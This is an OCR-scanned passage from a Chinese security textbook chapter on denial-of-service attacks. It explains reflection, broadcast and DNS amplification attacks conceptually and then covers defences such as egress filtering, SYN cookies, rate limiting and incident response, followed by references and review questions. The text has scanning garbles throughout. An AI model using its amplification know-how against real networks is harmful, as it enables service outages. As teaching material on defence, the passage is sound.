于 虚假 的 源 地 址 的 使 用 ， 使 得 响应 数据 包 以 发 散 状 的 形式 发 散 到 Internet 上 ， 因 而 很 容易 被 检 
测 到 ， 而 且 也 给 安全 分 析 人 员 进 行 流量 分 析 提 供 了 可 能 。 在 反射 攻击 中 ， 这 个 所 谓 的 虚假 源 地 
址 其 实 是 目标 系统 的 地 址 ， 而 且 响 应 数据 包 来 自 中 间 媒 介 ， 并 没有 明显 的 迹象 表明 这 种 攻击 的 
存在 ， 这 使 得 攻击 行为 很 难 被 察觉 。 只 有 在 目标 系统 、ISP 路 由 器 和 中 间 媒 介 系统 上 的 流量 特 
征 才能 作为 攻击 检测 的 依据 。 这 就 需要 特定 的 设备 和 监视 手段 来 收集 有 用 的 证 据 。 

成 功 进行 反射 攻击 的 基本 要 求 是 能 够 生成 带 有 虚假 源 地 址 的 数据 包 。 如 果 过 滤器 放置 在 
适当 的 位 置 ， 如 像 (RFC 2827 ) 中 描述 的 那样 ， 能 够 屏蔽 虚假 源 地 址 数据 包 ， 那 么 这 种 攻击 也 
就 不 存在 了 。 过 滤 数 据 包 也 是 抵御 反射 攻击 的 最 基本 的 方式 ， 这 不 同 于 SYN 欺骗 攻击 或 洪 泛 
攻击 (分 布 式 的 或 非 分 布 式 的 )。 它 们 可 以 利用 真实 的 源 地 址 而 获得 成 功 ， 其 结果 前 面 已 经 提 
到 了 。 


7.5.2 ”放大 攻击 


放大 攻击 是 反射 攻击 的 一 个 变种 ， 它 同样 是 发 送 带 有 虚假 源 地 址 的 数据 包 给 中 间 媒 介 。 不 
同 的 是 中 间 媒 介 对 每 个 来 自 攻击 者 的 初始 数据 包 会 产生 多 个 响应 数据 包 。 攻 击 者 可 以 发 送 初始 
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请 求 数据 包 到 某 些 网 络 的 广播 地 址 ， 那 么 这 个 网 络 上 的 所 有 主机 都 可 能 会 对 数据 包 中 源 地 址 所 
指向 的 主机 进行 响应 ， 也 就 是 说 这 些 主机 将 会 形成 一 个 如 图 7-7 所 描述 的 响应 数据 包 洪 泛 流 。 
实施 放大 攻击 需要 某 个 网 络 上 的 大 部 分 主机 都 提供 网 络 处 理 服 务 。 由 于 基于 ICMP 回 送 请 求 数 
据 包 的 ping 服务 是 TCP/IP 协议 的 基本 功能 ， 而 且 网 络 运营 商 通常 会 允许 ping 数据 包 进 入 其 网 
络 ， 因 此 攻击 者 一 般 会 选择 ping 洪 泛 攻击 。 著 名 的 Smurf DoS 程序 就 采用 这 种 机 制 并 风靡 一 
时 。 另 一 种 可 能 的 选择 是 适当 的 UDP 服务 ， 如 回 送 服务 等 。 Fraggle 程序 就 是 这 种 模式 的 攻击 。 
注意 ，TCP 服务 则 不 能 用 于 这 种 攻击 ， 因 为 TCP 服务 是 面向 连接 的 ， 其 目的 地 址 不 能 是 广播 
地 址 。 广 播 本 质 上 是 无 连接 的 。 











= EPI 反射 器 
ititi Bebe 中 间 媒 介 


图 7-7 放大 攻击 


抵御 放大 攻击 的 最 好 的 补充 措施 就 是 不 允许 定向 广播 由 外 部 进入 网 络 ， 而 且 这 也 是 一 种 
长 久 的 安全 建议 。 但 不 幸 的 是 ， 同 屏蔽 虚假 源 地 址 的 建议 一 样 ， 这 条 安全 建议 并 没有 被 广泛 采 
纳 和 实施 。 如 果 能 够 在 合适 的 位 置 放置 屏蔽 广播 数据 包 的 过 滤器 ， 那 么 这 种 放大 攻击 将 训 无 用 
处 。 另 一 个 抵御 放大 攻击 的 措施 是 限制 回 送 或 ping 等 网 络 服务 被 组 织 外 部 访问 。 然 而 限制 这 
类 服务 的 代价 就 是 无 法 进行 正常 的 网 络 故障 分 析 。 

攻击 者 通过 扫描 整个 mtermet， 寻 找 那 些 网 络 连接 良好 、 人 允许 定向 广播 的 可 执行 攻击 的 网 
络 ， 形 成 一 个 可 用 网 络 列表 。 这 个 网 络 列表 可 被 交换 并 用 于 实施 这 种 攻击 。 


7.5.3 DNS 放大 攻击 


反射 攻击 或 放大 攻击 的 另 一 个 变种 是 将 DNS 服务 器 作为 中 间 媒 介 系 统 ， 其 使 用 了 直接 
指向 合法 DNS 服务 器 的 数据 包 进 行 攻击 。 攻 击 者 利用 DNS 协议 将 较 小 的 请 求 数据 包 转 化 
为 较 大 的 响应 数据 包 而 达到 攻击 效果 。 这 种 类 型 的 放大 攻击 与 传统 的 利用 多 个 主机 产生 大 量 
的 响应 数据 包 的 放大 攻击 有 着 明显 的 不 同 。 利 用 标准 的 DNS 协议 ， 一 个 60 字 节 的 UDP 请 
求 数据 包 可 以 很 容易 地 生成 一 个 512 字 节 (传统 网 络 上 一 个 数据 包 所 允许 的 最 大 字 节 数 ) 的 
UDP 响应 包 。 而 仅仅 需要 一 个 有 着 足够 大 数量 的 DNS 记录 的 域名 服务 器 就 可 以 完成 其 攻击 
过 程 。 

这 种 利用 域名 服务 器 的 攻击 已 经 出 现 了 一 段 时 间 。 如 今 ，DNS 协议 为 了 支持 IPv6 、 安 全 
性 等 扩展 的 DNS 特征 ,已 经 扩展 到 允许 一 个 数据 包 的 大 小 超过 4000 字 节 。 如 果 所 利用 的 中 间 
媒介 系统 (域名 服务 器 ) 支持 扩展 的 DNS 协议 的 话 ， 那 么 攻击 者 就 可 以 制造 出 明显 强 于 利用 
经 典 的 DNS 协议 的 放大 攻击 。 

在 DNS 放大 攻击 中 ,攻击 者 常常 选择 那些 网 络 连 接 性 能 良好 的 DNS 服务 器 。 攻 击 者 构 
造 出 一 系列 源 地 址 为 目标 系统 地 址 的 DNS 请 求 数据 包 ， 并 把 这 些 数 据 包 发 送 到 攻击 者 所 选择 
的 域名 服务 器 上 。 这 些 域名 服务 器 在 接收 到 这 些 请 求 包 后 ， 按 照 DNS 协议 ,会 发 送 相应 数量 
的 响应 包 给 目标 系统 ， 这 些 系统 在 它们 看 来 是 合法 的 请 求 系 统 。 目 标 系统 因而 被 这 些 响应 流量 
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所 洪 泛 。 由 于 放大 作用 ， 攻 击 者 只 要 生成 中 等 流量 的 数据 包 就 可 以 形成 更 大 的 、 被 放大 的 数据 
流 ， 使 得 目标 系统 的 网 络 链 路 超 负 荷 。 中 间 媒 介 系 统 上 也 会 产生 明显 的 负载 。 攻 击 者 可 以 选择 
一 定数 量 的 具有 高 性 能 、 良 好 连接 的 系统 实施 攻击 ， 从 而 保证 中 间 媒 介 系 统 不 会 明显 地 超 负 
fet, 使 得 攻击 可 以 顺利 进行 。 

这 种 攻击 的 更 进一步 变种 则 利用 了 递归 的 域名 服务 器 。DNS 协议 的 一 个 基本 特征 是 允许 
一 个 域名 服务 器 查询 大 量 其 他 域名 服务 器 来 解析 客户 的 查询 。 这 样 做 仅仅 是 为 了 满足 本 地 用 户 
的 请 求 。 然 而 ， 很 多 的 DNS 系统 默认 情况 下 对 任何 请 求 都 支持 递归 查询 ， 这 种 域名 服务 器 被 
称 为 开放 递归 DNS 服务 器 。 攻 击 者 可 以 利用 这 样 的 域名 服务 器 进行 一 系列 的 基于 DNS 服务 的 
攻击 ,包括 DNS 放大 DoS 攻击 。 在 该 变种 中 ， 攻 击 者 以 大 量 的 开放 递归 DNS 服务 器 为 目标 。 
攻击 所 用 的 域名 不 一 定 保存 在 这 些 服务 器 上 ， 而 是 可 以 来 自 Internet 上 的 任何 位 置 。 查 询 结果 
被 直接 发 送 给 用 虚假 源 地 址 指定 的 期 望 目 标 。 

对 付 所 有 基于 反射 机 制 的 攻击 的 基本 方法 是 防止 使 用 虚假 地 址 。DNS 服务 器 的 正确 配置 ， 
尤其 是 限定 仅 对 内 部 客户 系统 提供 递归 响应 ， 如 像 RFC 5358 中 描述 的 那样 ， 可 以 很 好 地 限制 
这 类 攻击 的 一 些 变种 。 


7.6 ”拒绝 服务 攻击 防范 


有 一 些 步骤 可 以 用 来 降低 成 为 DoS 攻击 对 象 和 被 攻击 者 控制 用 于 DoS 攻击 的 可 能 性 。 不 
过 需要 明确 的 是 ， 我 们 不 可 能 完全 预防 DoS 攻击 。 特 别 地 ， 如 果 攻 击 者 可 以 构造 足够 大 的 合 
法 流量 到 达 你 的 系统 ， 那 么 这 个 流量 就 很 有 可 能 会 淹没 你 的 系统 网 络 连接 ， 从 而 限制 其 他 想 连 
接 到 你 的 系统 的 合法 网 络 请 求 。 实 际 上 ， 一 些 知 名 度 很 高 的 网 站 常常 会 遇 到 这 种 拒绝 服务 情 
况 。 典 型 地 ， 在 著名 的 Slashdot 新 闻 聚 合 站 点 发 布 一 条 新 闻 经 常会 导致 其 所 引用 的 服务 器 系统 
超 负 荷 。 与 此 类 似 ， 当 有 某 些 受 欢 迎 的 体育 活动 如 奥运 会 或 者 世界 杯 足 球赛 时 ， 报 道 这 些 赛事 
信息 的 网 站 往往 会 承受 很 高 的 网 络 通信 流量 。slashdotted flash crowd 和 flash event 往往 被 用 
来 描述 这 种 网 站 高 负荷 的 现象 。 对 于 这 种 偶然 的 或 者 恶意 的 服务 器 超 负荷 问题 ， 我 们 在 不 降低 
网 络 性 能 的 情况 下 ， 没 有 很 好 的 解决 办 法 。 常 用 的 抵御 措施 是 提供 显著 过 剩 的 网 络 带 宽 和 内 容 
相同 的 分 布 式 服务 器 。 尤 其 是 当 这 种 超 负荷 情况 可 以 预料 时 。 这 些 措施 已 经 在 一 些 受 欢迎 的 体 
育 网 站 上 实施 了 ， 但 这 种 措施 的 代价 很 高 。 

一 般 ， 抵 御 DDoS 攻击 有 下 面 4 条 防线 [ PENGO7, CHAN(2 ]: 
攻击 预防 和 先发制人 机 制 (攻击 前 ) : 这 种 机 制 允许 被 攻击 者 能 够 承受 攻击 而 不 拒绝 为 
合法 客户 提供 服务 。 攻 击 预防 技术 包括 执行 资源 消耗 的 策略 ， 根 据 需 求 提 供 后 备 资 源 。 
此 外 ， 预 防 机 制 修改 Internet 上 的 系统 和 协议 ， 来 减少 DDoS 攻击 的 可 能 性 。 
攻击 检测 和 过 滤 (攻击 时 ) : 这 种 机 制 试 图 在 攻击 一 开始 就 将 其 检测 出 来 并 迅速 响应 。 
这 样 可 以 使 得 攻击 对 目标 系统 的 影响 最 小 化 。 检 测 工 作 包 括 寻 找 可 疑 的 行为 模式 ， 响 
应 措施 则 包括 过 滤 掉 某 些 可 能 是 攻击 的 数据 包 。 
攻击 源 回溯 和 识别 (攻击 时 和 攻击 后 ) : 试图 识别 攻击 源 ， 通 常 被 作为 预防 未 来 攻击 的 
第 一 步 。 但 这 种 方式 往往 不 能 很 快 地 产生 结果 来 减轻 正在 发 生 的 攻击 。 
攻击 反应 (攻击 后 ): 试图 排除 或 消减 攻击 带 来 的 影响 。 

本 节 我 们 讨论 第 一 道 防线 ， 而 在 7.7 节 中 讨论 其 余 三 道 防线 。 

很 多 的 DoS 攻击 的 关键 性 内 容 是 使 用 虚假 的 源 地 址 。 这 既 可 以 掩盖 直接 或 分 布 式 DoS 攻击 
的 攻击 者 ， 也 可 用 来 将 反射 或 放大 的 网 络 通信 流量 涌 向 目标 系统 。 因 此 ， 根 本 的 、 长 期 有 效 的 
抵御 DoS 攻击 的 方法 是 限制 主机 系统 发 送 带 有 虚假 源 地 址 数据 包 的 能 力 。RFC 2827， 即 网 络 输 
Ait: 阻止 利用 耳 源 地 址 伪装 发 动 的 拒绝 服务 攻击 (Network Ingress Filtering : Defeating 
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Denial-of-service attacks which employ IP Source Address Spoofing ©) 直接 做 出 了 这 样 的 推荐 ， 
SANS, CERT 以 及 其 他 的 网 络 安 全 相关 组 织 已 经 采纳 了 这 种 方法 。 

过 滤器 应 该 尽 可 能 地 接近 数据 包 源 头 ， 放 在 可 以 获得 输入 数据 包 的 有 效 地 址 范围 的 路 由 
器 或 网 关 附 近 。 和 典型 地 ， 为 一 个 组 织 或 家 庭 用 户 提供 网 络 连接 的 ISP 路 由 器 就 是 可 以 安装 过 滤 
器 的 路 由 器 。 由 于 ISP 熟知 其 所 分 配给 客户 的 IP 地 址 ， 因 而 ISP 路 由 器 是 用 来 确认 来 自 其 客 
户 的 数据 包 中 源 地 址 是 否 有 效 的 最 佳 位 置 。 在 路 由 器 上 利用 明确 的 访问 控制 规则 来 确认 来 自 其 
客户 的 所 有 数据 包 上 的 源 地 址 是 否 为 ISP 所 分 配 的 地 址 。 当 然 ， 也 可 以 用 过 滤器 来 确认 源 地 址 
所 指向 的 返回 路 径 是 否 是 当前 数据 包 发 送 过 来 所 使 用 的 路 径 。 例 如 ， 在 Cisco 路 由 器 上 使 用 的 
ip verify unicast reverse-path 命令 。 后 一 种 方法 对 某 些 使 用 复杂 的 、 宛 余 的 路 由 设备 的 ISP 不 一 
定 可 行 。 实 现 某 种 形式 的 过 滤器 可 以 确保 ISP 用 户 不 能 发 送 带 有 虚假 源 地 址 的 数据 包 。 遗 憾 的 
是 ， 尽 管 这 是 一 个 非常 好 的 建议 , 但 是 很 多 ISP 并 不 提供 这 类 的 过 滤 服 务 。 特 别 是 那些 有 着 
众多 宽带 上 网 的 家 庭 用户 的 ISP 更 需要 考虑 这 些 问题 。 因 为 不 能 像 企 业 系统 那样 受到 很 好 的 保 
护 ， 这 些 系统 是 主要 的 攻击 目标 。 一 旦 被 攻击 者 控制 ， 这 些 系统 又 会 作为 中 间 媒 介 来 实施 其 他 
攻击 ， 如 DoS 攻击 。 这 种 问题 显然 是 由 于 ISP 没有 安装 反 欺 骗 过 滤器 造成 的 。 他 们 通常 不 安 
装 过 滤器 的 理由 是 安装 过 滤器 后 会 对 路 由 器 性 能 有 负面 影响 。 过 滤器 的 确 会 使 得 路 由 器 承担 一 
定 的 压力 ， 因 而 不 得 不 处 理 大 量 的 攻击 数据 流量 。 在 当今 DoS 攻击 如 此 流行 的 情况 下 ， 任 何 
ISP 或 组 织 都 没有 任何 理由 不 实施 这 种 基本 安全 建议 。 

尽管 抵御 措施 往往 是 在 被 攻击 后 才 实施 的 ， 但 所 有 的 抵御 洪 泛 攻击 的 措施 应 该 在 整个 
Internet 上 实施 ， 而 不 仅仅 是 在 单个 组 织 的 边界 路 由 器 上 。 过 滤器 应 该 被 应 用 于 网 络 流量 离开 
其 ISP 网 络 之 前 ， 或 者 甚至 要 在 其 网 络 的 入口 点 应 用 。 尽 管 一 般 不 可 能 识别 出 具有 虚假 源 地 址 
的 数据 包 ， 但 是 使 用 反 向 路 径 过 滤器 可 以 帮助 识别 出 从 ISP 到 达 虚 假 源 地 址 的 路 径 不 同 于 其 
到 达 ISP 的 路 径 的 数据 包 。 也 可 以 通过 限制 接收 数据 包 的 速率 来 抵御 那些 利用 特殊 数据 包 如 
ICMP 洪 泛 或 针对 诊断 服务 的 UDP 洪 泛 所 进行 的 攻击 。 在 正常 的 网 络 运 行 中 ， 这 些 特殊 数据 
包 是 由 网 络 流量 中 的 一 小 部 分 构成 的 。 很 多 的 路 由 器 ， 尤 其 是 那些 ISP 所 使 用 的 高 端 路 由 器 具 
有 限制 数据 包 接收 速率 的 能 力 。 通 过 合理 设置 该 速率 可 以 有 效 地 减轻 洪 泛 攻击 的 影响 ， 从 而 允 
许 其 他 类 型 的 流量 即使 发 生 攻击 也 能 到 达 目 标 组 织 。 

可 以 使 用 改进 版 本 的 TCP 连接 处 理 程 序 来 专门 抵御 SYN 欺骗 攻击 。 把 请 求 连接 的 关键 
信息 加 密 编码 并 保存 到 cookie 中 ， 而 不 是 保存 在 服务 器 上 ， 然 后 将 这 个 cookie 作为 服务 器 的 
初始 序号 封装 在 SYN-ACK 响应 包 中 发 送 给 客户 端 。 当 合法 用 户 返回 ACK 应 答 包 时 ， 要 求 在 
ACK 应 答 包 中 包含 序号 加 1 的 cookie， 然 后 服务 器 根据 这 个 cookie 来 重 构 那 些 曾 经 在 TCP 连 
接 表 中 存储 的 相关 信息 。 当 然 该 技术 一 般 用 于 防止 TCP 连接 表 溢 出。 其 优点 是 在 三 次 握手 成 
功 之 前 ， 服 务 器 上 不 会 有 内 存 资源 消耗 ， 而 且 服 务 器 有 足够 的 理由 相信 数据 包 中 的 源 地 址 对 应 
于 一 个 正 与 服务 器 交互 的 真实 的 客户 端 。 

当然 这 里 也 有 一 些 缺 点 。 首 先 ， 服 务 器 要 消耗 一 定 的 计算 资源 来 计算 cookie; HK, R 
制 了 某 些 TCP 扩展 功能 ， 如 大 窗口 (large window)。 这 些 扩展 功 能 ， 连 同 其 他 的 请 求 连接 
到 其 他 细节 往往 是 由 服务 器 保存 的 。 然 而 ， 这 些 连 接 信息 太 大 而 不 能 在 cookie 中 被 编码 ， 
为 没有 足够 的 空间 。 另 一 种 方法 是 服务 器 完全 拒绝 连接 ， 因 为 没有 剩余 的 资源 管理 这 些 请 
求 ， 这 也 是 系统 在 处 理 高 连接 请 求 接 人 处 理 能 力 方面 的 改进 。 这 种 方法 是 由 很 多 人 独立 发 
明 的 ， 最 著名 的 一 个 版 本 就 是 SYN cookie， 其 主要 发 明 人 是 Daniel Bernstein。 它 在 最 近 的 


© 注意， 虽然 题目 使 用 了 Ingress Filtering, RFC 实际 上 描述 的 是 Egress Filtering， 我 们 讨论 的 也 是 该 行为 。 真 
正 的 ingress filtering 利用 属于 本 地 网 络 的 源 地 址 来 阻止 外 部 的 数据 包 。 它 只 能 对 一 小 部 分 攻击 提供 防护 。 
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FreeBSD 和 Linux 操作 系统 中 已 经 得 到 应 用 ， 尽 管 不 是 默认 启动 的 。 在 Windows 2000, XP 
以 及 以 后 版 本 中 也 包含 这 种 技术 的 一 个 版 本 。 这 种 技术 可 以 应 用 在 任何 TCP 连接 表 溢 出 的 
场合 。 l 

当 TCP 连接 表 溢 出 时 ， 我 们 可 以 通过 修改 系统 的 TCP/IP 网 络 处 理 程 序 来 选择 性 地 丢弃 一 
个 TCP 连接 表 中 不 完全 连接 的 表 项 ， 而 允许 新 的 连接 请 求 。 这 就 是 选择 性 丢弃 或 者 称 为 随机 
EER., Bit TCP 连接 请 求 表 中 的 表 项 大 部 分 来 自 攻击 连接 ， 那 么 被 丢弃 的 表 项 将 可 能 会 对 
应 着 一 个 攻击 数据 包 ， 因 而 表 项 的 丢弃 对 客户 端 是 没有 影响 的 。 如 果 不 这 样 做 ,合法 用 户 的 连 
接 请 求 尝试 将 无 法 得 到 服务 器 的 响应 并 且 只 能 重 试 。 然 而 ， 这 种 策略 确实 在 连接 表 溢 出 时 给 新 
连接 提供 了 尝试 机 会 ， 使 其 不 会 被 立即 抛弃 。 

另 一 种 抵御 SYN 欺骗 的 措施 是 修改 TCP/IP 网 络 处 理 程序 中 所 使 用 的 参数 。 这 些 参 数 包 括 
TCP 连接 表 的 大 小 及 当 未 收 到 响应 时 删除 表 项 的 超时 时 间 。 该 方法 可 以 与 限制 网 络 连 接 的 速率 
一 起 用 来 管理 服务 器 所 允许 的 最 大 连接 请 求 率 。 尽 管 修改 参数 可 以 加 大 攻击 者 攻击 的 难度 , 但 
是 这 并 不 能 从 根本 上 预防 攻击 。 

抵御 广播 放大 攻击 的 最 好 措施 是 屏蔽 IP 定向 广播 的 使 用 。 这 可 以 由 ISP 或 者 那些 被 利用 
作为 中 间 媒 介 的 组 织 来 实现 。 正 如 在 本 章 前 面 所 描述 的 ， 这 个 建议 以 及 反 欺 骗 过 滤器 都 是 长 期 
有 效 的 安全 建议 ， 所 有 的 组 织 都 应 该 贯彻 实施 。 通 常 ， 限 制 或 阻塞 流向 可 疑 服务 、 源 端口 和 目 
的 端口 组 合 的 网 络 流量 ， 可 以 限制 那些 被 用 来 攻击 某 一 组 织 的 反射 攻击 。 

抵御 以 应 用 程序 资源 为 攻击 目标 的 DoS 攻击 ， 一 般 要 求 修改 作为 目标 的 应 用 程序 ， 如 
Web 服务 器 。 抵 御 措施 可 以 包括 试图 判断 数据 包 是 来 自 合法 的 、 人 工 发 起 的 交互 ， 还 是 来 自 自 
动 DoS 攻击 。 这 可 以 采用 迷宫 图 、captcha 等 形式 ， 这 对 于 大 多 数 人 来 说 很 容易 解决 ， 但 是 对 
于 计算 机 来 说 则 是 一 件 很 困难 的 事情 。 这 种 方法 在 很 多 的 大 型 网 站 上 如 Hotmail、Yahoo 等 已 
经 使 用 。 另 外 ， 应 用 程序 也 可 以 限制 某 种 类 型 的 交互 的 速率 以 持续 提供 某 种 类 型 的 服务 。 部 分 
这 样 的 方案 在 [KAND05] 中 有 说 明 。 

除了 这 些 直接 抵御 DoS 攻击 的 措施 外 ， 完 整 的 良好 系统 安全 实践 也 是 必需 的 。 这 样 做 的 
目的 是 不 让 自己 的 主机 被 攻击 者 控制 成 为 僵尸 机 。 对 高 性 能 、 连 接 良 好 的 服务 器 的 合理 配置 和 
监视 ， 也 是 保证 这 些 系统 不 被 作为 潜在 的 中 间 媒 介 服 务 器 所 必需 的 。 

最 后 ， 一 个 基于 网 络 服务 的 组 织 应 该 配置 镜像 ， 在 多 个 站 点 上 复制 出 多 个 同样 的 、 具 有 多 
条 网 络 连接 的 服务 器 。 这 是 一 种 很 好 的 实践 方案 ， 可 以 提供 更 高 级 别 的 稳定 性 和 容错 能 力 ， 而 
不 仅仅 是 简单 的 DoS 攻击 响应 措施 。 


7.7 ”对 拒绝 服务 攻击 的 响应 


为 了 成 功 地 响应 DoS 攻击 ， 一 个 良好 的 偶然 事件 响应 计划 是 必需 的 。 这 就 应 该 包括 如 何 
联系 你 的 Internet 服务 提供 商 的 技术 人 员 。 因 为 在 受到 攻击 的 情况 下 ， 网 络 可 能 是 无 法 正常 运 
行 的 ， 所 以 可 能 必须 使 用 非 网 络 连接 的 联系 方式 。DoS 攻击 ， 尤 其 是 洪 泛 攻击 ， 所 产生 的 流量 
数据 包 只 能 在 你 的 服务 器 的 上 行 流量 中 被 过 滤 掉 。 这 个 响应 计划 也 要 包括 对 于 攻击 的 具体 响应 
措施 。 组 织 人 员 和 ISP 方面 的 责任 划分 的 依据 是 组 织 的 可 用 资源 和 技术 能 力 。 

组 织 内 部 ， 应 该 已 经 实施 了 或 安装 了 标准 的 反 欺 骗 、 定 向 广播 和 速率 限制 过 滤器 ， 这 些 
在 前 面 的 章节 中 已 经 讨论 过 。 理 想 状态 下 ， 还 应 该 装 有 某 种 形式 的 网 络 自动 监视 和 人 侵 检测 系 
统 ， 从 而 在 遇 到 异常 数据 时 ， 可 以 很 快 地 检测 到 。 在 第 6 章 中 我 们 已 经 着 重 讨论 了 这 些 系统 。 
关于 如 何 最 佳 识 别 异常 流量 的 研究 工作 一 直 在 进行 。 识 别 异常 流量 可 以 基于 流 信息 、 源 地 址 或 
者 其 他 流量 特征 的 模式 的 变化 ， 正 如 [CARL06] 中 所 论述 的 。 对 于 一 个 组 织 来 说 ， 了 解 自己 的 
正常 网 络 流量 模式 信息 是 很 重要 的 ， 因 为 这 个 组 织 可 以 明确 自己 的 网 络 流量 特征 基线 ， 从 而 快 
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速 地 检测 出 异常 数据 流 。 如 果 没 有 这 样 的 系统 和 理论 基础 的 话 ， 最 早 的 攻击 提示 应 该 只 能 是 来 
自 内 部 或 外 部 用 户 的 关于 其 网 络 连 接 失 败 的 报告 了 。 判 定 出 这 个 网 络 连接 失败 是 由 于 攻击 、 错 
误 的 网 络 配置 、 硬 件 故障 还 是 软件 问题 引起 的 ， 会 花费 很 多 时 间 。 

当 检 测 到 一 次 DoS 攻击 ， 我 们 首先 要 做 的 事情 是 判定 出 这 次 攻击 的 类 型 ， 并 选择 一 个 最 
佳 的 方法 来 抵御 这 次 攻击 。 通 常 这 个 过 程 应 该 包括 : 数据 包 的 捕获 、 数 据 包 的 分 析 、 寻 找 常 见 
的 攻击 数据 包 类 型 。 该 过 程 一 般 由 组 织 的 人 员 利 用 合适 的 网 络 分 析 工具 来 完成 。 如 果 组 织 缺 乏 
这 个 过 程 所 需要 的 资源 或 技术 ， 那 么 这 就 需要 该 组 织 的 ISP 服务 提供 商 完 成 捕获 和 分 析 工作 。 
通过 这 样 的 分 析 ， 我 们 就 可 以 判定 出 所 受到 攻击 的 类 型 ， 并 合理 配置 过 滤器 来 过 滤 掉 这 些 攻击 
数据 包 。 以 上 所 用 到 的 工具 都 需要 ISP 服务 提供 商 安 装 到 路 由 器 上 。 如 果 攻 击 者 的 对 象 是 目标 
系统 或 应 用 程序 的 一 个 缺陷 ， 而 不 是 通过 高 流量 的 数据 包 造 成 网 络 阻塞 ， 那 么 这 种 情况 下 就 要 
求 管理 者 能 够 及 时 地 发 现 这 个 缺陷 并 修复 它 ， 以 阻止 将 来 的 攻击 。 

组 织 可 能 也 希望 ISP 能 够 追踪 攻击 数据 包 流 而 确定 这 些 包 的 源 。 然 而 ， 如 果 攻 击 使 用 了 源 
地 址 欺骗 ， 这 将 是 很 困难 的 ， 而 且 非 常 耗 时 。 是 否 这 样 做 ， 取 决 于 组 织 是 否 希望 将 攻击 报告 给 
相关 的 执法 部 门 。 如 果 组 织 希 望 借助 于 法 律 手段 解决 问题 ， 还 必须 收集 另外 的 证 据 ， 活 动 必 须 
文档 化 ， 以 支持 后 续 的 法 律 诉 讼 。 

如 果 攻 击 是 来 自 大 量 的 分 布 式 或 反射 系统 的 扩展 的 、 协 同 的 、 洪 泛 的 攻击 ， 那 么 要 想 过 
滤 掉 足够 的 数据 包 从 而 保证 网 络 连接 的 连通 性 几乎 是 不 可 能 的 。 在 这 种 情况 下 ， 需 要 一 个 应 
急 策略 来 切换 到 备份 服务 器 ， 或 者 快速 地 用 新 的 服务 器 建立 具有 新 地 址 的 新 站 点 ， 从 而 恢复 
服务 。 如 果 缺 乏 这 些 措施 ， 一 旦 这 种 攻击 对 准 某 个 服务 器 ， 那 么 这 个 服务 器 就 会 很 快 失去 其 
网 络 连 接 能 力 。 当 一 个 组 织 的 某 些 职能 依赖 于 网 络 连接 时 ， 这 种 攻击 所 产生 的 影响 就 会 更 加 
明显 。 

除了 快速 地 对 这 种 类 型 的 攻击 进行 响应 外 ， 组 织 的 事故 响应 策略 应 该 确定 用 来 响应 类 似 的 
意外 情况 的 进一步 措施 。 这 包括 了 攻击 分 析 和 响应 ， 并 从 经 验 中 吸取 教训 以 改进 今后 的 处 理 措 
施 。 理 想 情况 下 ， 一 个 组 织 的 安全 性 能 是 可 以 得 到 改善 的 。 在 第 17 章 中 ,我 们 将 会 进一步 探 
讨 事故 响应 策略 。 


7.8 推荐 读物 


[PENG07] 是 一 份 关 于 Dos 攻击 和 防护 的 杰出 的 调查 报告 。 其 他 综合 性 的 调查 报告 有 
[HAND06]。[CICH12] 包含 了 有 关 DoS 攻击 种 类 和 如 何 响应 这 些 攻击 的 一 些 指导 信息 。 

[CHAN02] 提供 了 一 些 防 范 DDoS 攻击 的 建议 。[LIU09] 是 一 篇 关于 DDoS 攻击 的 简短 但 
是 非常 有 用 的 文章 。 


CHAN02 Chang, R. “Defending Against Flooding-Based Distributed Denial-of-Service 
Attacks: A Tutorial.” JEEE Communications Magazine, October 2002. 

CICH12 = Cichonksi, P. Computer Security Incident Handling Guide. NIST Special 
Publication 800-61, August 2012. 

HANDO6 Handley, M., and Rescorla, E. Internet Denial-of-Service Considerations. 
RFC 4732, November 2006. 

LIU09 Liu, S. “Surviving Distributed Denial-of-Service Attacks.” /T Pro, 
September/October 2009. 

PENG07 Peng, T.; Leckie, C.; and Rammohanarao, K. “Survey of Network-Based 
Defense Mechanisms Countering the DoS and DDoS Problems.” ACM 
Computing Surveys, April 2007. 
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79 关键 术语 、 复 习题 和 习题 


关键 术语 
amplification attack (放大 攻击 ) ICMP flood (ICMP 洪 泛 ) 
availability (可 用 性 ) poison packet (有 毒 数据 包 ) 
backscatter traffic (发 散 反馈 流量 ) random drop (MILER) 
botnet (僵尸 网 络 ) reflection attack (反射 攻击 ) 
denial of service (DoS ， 拒 绝 服务 攻击 ) source address spoofing ( 源 地 址 欺骗 ) 
directed broadcast (定向 广播 ) SYN flood (SYN 洪 泛 ) 
distributed denial of service (DDoS ， 分 布 式 拒绝 服 SYN spoofing (SYN 欺骗 ) 
务 攻击 ) three-way TCP handshake (TCP 三 次 握手 ) 
DNS amplification attack (DNS 放大 攻击 ) UDP flood (UDP 洪 泛 ) 
flooding attack (HZ Wit) zombie (僵尸 机 ) 
复习 题 


7.1 
7.2 
7.3 
7.4 
7.5 
7.6 
7.7 
7.8 
7.9 
7.10 
7.11 
7.12 
7.13 
7.14 
7.15 


7.16 
7.17 
7.18 


试 述 拒绝 服务 (DoS) 攻击 的 定义 。 
哪些 类 型 的 资源 被 DoS 攻击 作为 攻击 目标 ? 
洪 泛 攻击 的 目标 是 什么 ? 
在 通常 的 洪 泛 攻 击 当 中 ， 一 般 会 使 用 什么 样 的 数据 包 ? 
为 什么 很 多 的 DoS 攻击 使 用 带 有 虚假 源 地 址 的 数据 包 ? 
什么 是 “后 向 散射 流量 ”? 它 能 为 哪 种 Dos 攻击 提供 信息 ? 它 不 能 为 哪 种 Dos 攻击 提供 信息 ? 
给 出 分 布 式 拒绝 服务 (DDoS) 攻击 的 定义 。 
DDoS 攻击 通常 所 使 用 的 体系 结构 是 什么 样 的 ? 
给 出 反射 攻击 的 定义 。 
给 出 放大 攻击 的 定义 。 
防范 DoS 攻击 的 基本 措施 是 什么 ? 在 哪里 实施 ? 
哪些 防范 措施 可 能 抵御 非 欺骗 的 洪 泛 攻击 ”能 否 彻底 预防 这 种 攻击 ? 
什么 措施 可 以 防范 TCP SYN 欺骗 攻击 ? 
何 种 防护 措施 可 以 对 抗 DNS 放大 攻击 ? 在 哪 实施 ? 这 种 攻击 的 特殊 之 处 是 什么 ? 
slashdotted 和 flash crowd 分 别 表示 什么 ? 正常 的 网 络 超 负荷 与 DoS 攻击 所 造成 的 服务 器 拒绝 服务 
之 间 的 关系 是 什么 ? 
什么 措施 可 以 防止 某 组 织 的 主机 系统 被 用 作 放大 攻击 的 中 间 媒 介 ? 
当 检 测 到 DoS 攻击 时 ， 我 们 应 该 采取 什么 措施 ? 
